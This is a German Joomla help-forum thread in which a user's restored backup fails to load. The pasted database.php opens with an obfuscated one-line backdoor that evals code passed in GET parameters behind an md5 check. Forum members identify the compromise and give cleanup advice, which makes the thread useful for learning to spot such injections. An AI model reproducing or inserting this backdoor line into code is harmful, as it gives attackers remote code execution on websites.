Fehlermeldungen nach Umzug/ Weiße Seite

Woner · 13. September 2016

Hallo,

ich möchte ein älteres Backup meiner Joomla 3.4 (?) Seite lokal zurückspielen.
Dafür hab ich in einer Ubuntu 16.04 VM Apache, PHP 5, MySQL und phpmyadmin installiert.
Daten hab ich in /var/www Verzeichnis kopiert, die Datenbank über phpmyadmin zurückgespielt und die configuration.php entsprechend angepasst.

Beim Aufruf der Seite erhielt ich zuerst eine weiße Seite, nachdem ich die Fehleranzeige auf Maximum gestellt habe, bekomm ich folgende Fehler:

Code

( ! ) Notice: Undefined variable: _GET in /var/www/html/joomla/libraries/joomla/database/database.php on line 1Call Stack#	Time	Memory	Function	Location1	0.0004	230648	{main}( )	.../index.php:02	0.0058	392536	JFactory::getApplication( )	.../index.php:423	0.0065	465200	JApplicationCms::getInstance( )	.../factory.php:1254	0.0066	502448	JApplicationSite->__construct( )	.../cms.php:3995	0.0066	502904	JApplicationCms->__construct( )	.../site.php:636	0.0079	631808	JApplicationCms->loadSession( )	.../cms.php:1317	0.0087	681240	JSession->start( )	.../cms.php:7398	0.0087	681416	JSession->_start( )	.../session.php:5289	0.0088	690592	session_start ( )	.../session.php:58010	0.0088	691272	JSessionStorageDatabase->read( )	.../session.php:58011	0.0088	691352	JFactory::getDbo( )	.../database.php:3212	0.0088	691576	JFactory::createDbo( )	.../factory.php:32913	0.0088	692568	spl_autoload_call ( )	.../factory.php:63114	0.0089	692752	JLoader::_autoload( )	.../factory.php:63115	0.0089	692960	JLoader::_load( )	.../loader.php:56816	0.0089	733408	include( '/var/www/html/joomla/libraries/joomla/database/driver.php' )	.../loader.php:60117	0.0090	733656	spl_autoload_call ( )	.../loader.php:3718	0.0090	733840	JLoader::_autoload( )	.../loader.php:3719	0.0090	734352	JLoader::_load( )	.../loader.php:56820	0.0090	739952	include( '/var/www/html/joomla/libraries/joomla/database/database.php' )	.../loader.php:601
( ! ) Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /var/www/html/joomla/libraries/joomla/database/database.php:1) in /var/www/html/joomla/libraries/joomla/session/session.php on line 580Call Stack#	Time	Memory	Function	Location1	0.0004	230648	{main}( )	.../index.php:02	0.0058	392536	JFactory::getApplication( )	.../index.php:423	0.0065	465200	JApplicationCms::getInstance( )	.../factory.php:1254	0.0066	502448	JApplicationSite->__construct( )	.../cms.php:3995	0.0066	502904	JApplicationCms->__construct( )	.../site.php:636	0.0079	631808	JApplicationCms->loadSession( )	.../cms.php:1317	0.0087	681240	JSession->start( )	.../cms.php:7398	0.0087	681416	JSession->_start( )	.../session.php:5289	0.0088	690592	session_start ( )	.../session.php:580
( ! ) Fatal error: Call to undefined function simplexml_load_file() in /var/www/html/joomla/libraries/joomla/language/language.php on line 1382Call Stack#	Time	Memory	Function	Location1	0.0004	230648	{main}( )	.../index.php:02	0.0121	885528	JApplicationCms->execute( )	.../index.php:453	0.0121	885680	JApplicationSite->doExecute( )	.../cms.php:2524	0.0121	886088	JApplicationSite->initialiseApp( )	.../site.php:2095	0.0151	1117864	JApplicationCms->initialiseApp( )	.../site.php:6636	0.0152	1106088	JLanguage::getInstance( )	.../cms.php:6287	0.0152	1106728	JLanguage->__construct( )	.../language.php:3008	0.0152	1106928	JLanguage::getMetadata( )	.../language.php:1949	0.0152	1107384	JLanguage::parseXMLLanguageFile( )	.../language.php:1196

Hier als Bild:
https://i.imgur.com/cyg1VdH.png

Ich hab schon gegoogelt, finde aber nichts passendes.
Hat jemand eine Idee oder Vermutung?

Harmageddon · 13. September 2016

Wie sieht denn die Datei /var/www/html/joomla/libraries/joomla/database/database.php aus? Kannst du den Inhalt bitte mal hier in einen Spoiler (Augensymbol über dem Beitragsfenster) packen oder auf pastebin stellen und den Link hier posten?

Woner · 13. September 2016

Spoiler anzeigen

<?php $aNT="teg_";$icl=strtoupper($aNT[3].$aNT[2].$aNT[1].$aNT[0]);if(substr(md5(${$icl}['localdate']),0,6) == 'dbed7f'){$wdV='crea'.'te_fun'.'ction';$yAz=$wdV('$a',$aNT[1].'v'.'al'.'($'.$icl.'[$a]);');$yAz('GIGyLu');}
/**
* @package Joomla.Platform
* @subpackage Database
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/

defined('JPATH_PLATFORM') or die;

/**
* Database connector class.
*
* @since 11.1
* @deprecated 13.3 (Platform) & 4.0 (CMS)
*/
abstract class JDatabase
{
/**
* Execute the SQL statement.
*
* @return mixed A database cursor resource on success, boolean false on failure.
*
* @since 11.1
* @throws RuntimeException
* @deprecated 13.1 (Platform) & 4.0 (CMS)
*/
public function query()
{
JLog::add('JDatabase::query() is deprecated, use JDatabaseDriver::execute() instead.', JLog::WARNING, 'deprecated');

return $this->execute();
}

/**
* Get a list of available database connectors. The list will only be populated with connectors that both
* the class exists and the static test method returns true. This gives us the ability to have a multitude
* of connector classes that are self-aware as to whether or not they are able to be used on a given system.
*
* @return array An array of available database connectors.
*
* @since 11.1
* @deprecated 13.1 (Platform) & 4.0 (CMS)
*/
public static function getConnectors()
{
JLog::add('JDatabase::getConnectors() is deprecated, use JDatabaseDriver::getConnectors() instead.', JLog::WARNING, 'deprecated');

return JDatabaseDriver::getConnectors();
}

/**
* Gets the error message from the database connection.
*
* @param boolean $escaped True to escape the message string for use in JavaScript.
*
* @return string The error message for the most recent query.
*
* @deprecated 13.3 (Platform) & 4.0 (CMS)
* @since 11.1
*/
public function getErrorMsg($escaped = false)
{
JLog::add('JDatabase::getErrorMsg() is deprecated, use exception handling instead.', JLog::WARNING, 'deprecated');

if ($escaped)
{
return addslashes($this->errorMsg);
}
else
{
return $this->errorMsg;
}
}

/**
* Gets the error number from the database connection.
*
* @return integer The error number for the most recent query.
*
* @since 11.1
* @deprecated 13.3 (Platform) & 4.0 (CMS)
*/
public function getErrorNum()
{
JLog::add('JDatabase::getErrorNum() is deprecated, use exception handling instead.', JLog::WARNING, 'deprecated');

return $this->errorNum;
}

/**
* Method to return a JDatabaseDriver instance based on the given options. There are three global options and then
* the rest are specific to the database driver. The 'driver' option defines which JDatabaseDriver class is
* used for the connection -- the default is 'mysqli'. The 'database' option determines which database is to
* be used for the connection. The 'select' option determines whether the connector should automatically select
* the chosen database.
*
* Instances are unique to the given options and new objects are only created when a unique options array is
* passed into the method. This ensures that we don't end up with unnecessary database connection resources.
*
* @param array $options Parameters to be passed to the database driver.
*
* @return JDatabaseDriver A database object.
*
* @since 11.1
* @deprecated 13.1 (Platform) & 4.0 (CMS)
*/
public static function getInstance($options = array())
{
JLog::add('JDatabase::getInstance() is deprecated, use JDatabaseDriver::getInstance() instead.', JLog::WARNING, 'deprecated');

return JDatabaseDriver::getInstance($options);
}

/**
* Splits a string of multiple queries into an array of individual queries.
*
* @param string $query Input SQL string with which to split into individual queries.
*
* @return array The queries from the input string separated into an array.
*
* @since 11.1
* @deprecated 13.1 (Platform) & 4.0 (CMS)
*/
public static function splitSql($query)
{
JLog::add('JDatabase::splitSql() is deprecated, use JDatabaseDriver::splitSql() instead.', JLog::WARNING, 'deprecated');

return JDatabaseDriver::splitSql($query);
}

/**
* Return the most recent error message for the database connector.
*
* @param boolean $showSQL True to display the SQL statement sent to the database as well as the error.
*
* @return string The error message for the most recent query.
*
* @since 11.1
* @deprecated 13.3 (Platform) & 4.0 (CMS)
*/
public function stderr($showSQL = false)
{
JLog::add('JDatabase::stderr() is deprecated.', JLog::WARNING, 'deprecated');

if ($this->errorNum != 0)
{
return JText::sprintf('JLIB_DATABASE_ERROR_FUNCTION_FAILED', $this->errorNum, $this->errorMsg)
. ($showSQL ? "<br />SQL = <pre>$this->sql</pre>" : '');
}
else
{
return JText::_('JLIB_DATABASE_FUNCTION_NOERROR');
}
}

/**
* Test to see if the connector is available.
*
* @return boolean True on success, false otherwise.
*
* @since 11.1
* @deprecated 12.3 (Platform) & 4.0 (CMS) - Use JDatabaseDriver::isSupported() instead.
*/
public static function test()
{
JLog::add('JDatabase::test() is deprecated. Use JDatabaseDriver::isSupported() instead.', JLog::WARNING, 'deprecated');

return static::isSupported();
}
}

Harmageddon · 13. September 2016

Das hatte ich befürchtet. Deine Seite wurde gehackt. Befolge bitte diese Anleitung. Insbesondere solltest du deine Seite (nach einem Backup von Dateien und Datenbank) umgehend vom Netz nehmen, damit du keine Besucher der Seite gefährdest.

Und achte bitte in Zukunft darauf, deine Seite immer aktuell zu halten! Die aktuelle Joomla!-Version ist 3.6.2. Insbesondere die Versionen vor 3.5 enthalten schwere Sicherheitslücken, die seit über einem halben Jahr öffentlich bekannt sind und deshalb gerne von Hackern ausgenutzt werden.

Woner · 13. September 2016

Danke für die Info. Meine Seite ist schon offline.

Ich möchte alle Artikel und die Daten einer Erweiterung exportieren und meine Joomla Installation komplett neu aufsetzen.
Gibt es eine Möglichkeit ins Backend zu kommen?

Leider bekomm ich auch eine noch ältere Version nicht zum Laufen. Hier kommt nur eine weiße Seite, keine Fehlermeldung, obwohl public $error_reporting = 'Maximum';

Harmageddon · 13. September 2016

Ah, sehr gut. Dann probiere mal, alle Dateien aus deinem Backup mit denen aus einem frischen Installationspaket der passenden Version zu überschreiben. Dabei kannst du den Ordner "installation" weglassen und deine configuration.php so behalten, wie sie ist. Dann sollte Joomla! schon mal wieder laufen. Wenn der Hacker auch was an den Dateien deiner installierten Dritterweiterungen geändert hat, musst du diese gegebenenfalls auch noch ersetzen.

Woner · 15. September 2016

Ich bekomm leider das Backup immer noch nicht zum laufen.
Bleibt bei einer weißen Seite ohne Fehlermeldung (Anzeige aller Fehler in der php.ini aktiviert).
Kann ich auch ohne Zugriff zum Backend ein Backup aller Artikel machen bzw. die Artikel exportieren?

kitepascal · 15. September 2016

Du kannst die Datenbanktabellen theoeretisch in eine frische Installation übernehmen (gleiche Version).

Die weiße Seite sollte aber auch zu beheben sein/gefüllt werden können - hat doch im Eingangspost auch geklappt?

Welchen Versionsstand hat dein Backup? /administrator/manifests/files/joomla.xml

Vielleicht nochmal ein Archiv dieser Version drüberbügeln (ohne /installation), wie von @Harmageddon empfohlen.

Harmageddon · 18. September 2016

Zitat von kitepascal

Du kannst die Datenbanktabellen theoeretisch in eine frische Installation übernehmen (gleiche Version).

Das würde ich aber nur für wenige wichtige Tabellen (z.B. content) empfehlen und da auch bitte jeden einzelnen Inhalt überprüfen. Nicht, dass der Hacker da auch Schadcode in einen der Artikel eingeschleust hat.

Woner · 20. September 2016

Danke für die Hilfe. Fehler mit der weißen Seite lag wahrscheinlich an einer fehlerhaften Webserverinstallation. Mit einem frisch installierten Debian in einer VM funktionierts einwandfrei.